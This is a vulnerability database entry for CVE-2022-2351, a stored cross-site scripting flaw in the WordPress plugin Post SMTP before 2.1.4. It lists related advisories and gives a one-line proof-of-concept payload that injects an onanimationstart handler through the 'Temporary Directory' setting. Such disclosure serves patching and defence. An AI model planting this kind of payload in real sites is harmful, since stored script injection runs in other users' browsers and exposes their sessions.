Lucene search
+L

Post SMTP < 2.1.4 - Admin+ Stored Cross-Site Scripting

🗓️ 22 Aug 2022 00:00:00Reported by Raad Haddad of Cloudyrion GmbHType 
wpexploit
 wpexploit
👁 191 Views

Post SMTP vulnerability in "Temporary Directory" settin

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-2351
16 Sep 202209:15
attackerkb
Circl
CVE-2022-2351
16 Sep 202212:38
circl
CNNVD
WordPress plugin Post SMTP Mailer/Email Log 跨站脚本漏洞
16 Sep 202200:00
cnnvd
CVE
CVE-2022-2351
16 Sep 202208:40
cve
Cvelist
CVE-2022-2351 Post SMTP < 2.1.4 - Admin+ Stored Cross-Site Scripting
16 Sep 202208:40
cvelist
EUVD
EUVD-2022-34620
3 Oct 202520:07
euvd
NVD
CVE-2022-2351
16 Sep 202209:15
nvd
OpenVAS
WordPress Post SMTP Mailer/Email Log Plugin < 2.1.4 XSS Vulnerability
4 Oct 202200:00
openvas
OSV
CVE-2022-2351 Post SMTP < 2.1.4 - Admin+ Stored Cross-Site Scripting
16 Sep 202208:40
osv
Prion
Cross site scripting
16 Sep 202209:15
prion
Rows per page
Put the following payload in the Post SMTP > Settings > Advanced > "Temporary Directory" settings: /tmp" style=animation-name:rotation onanimationstart=alert(/XSS/)//

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Aug 2022 09:51Current
4.8Medium risk
Vulners AI Score4.8
CVSS 3.14.8
EPSS0.00559
191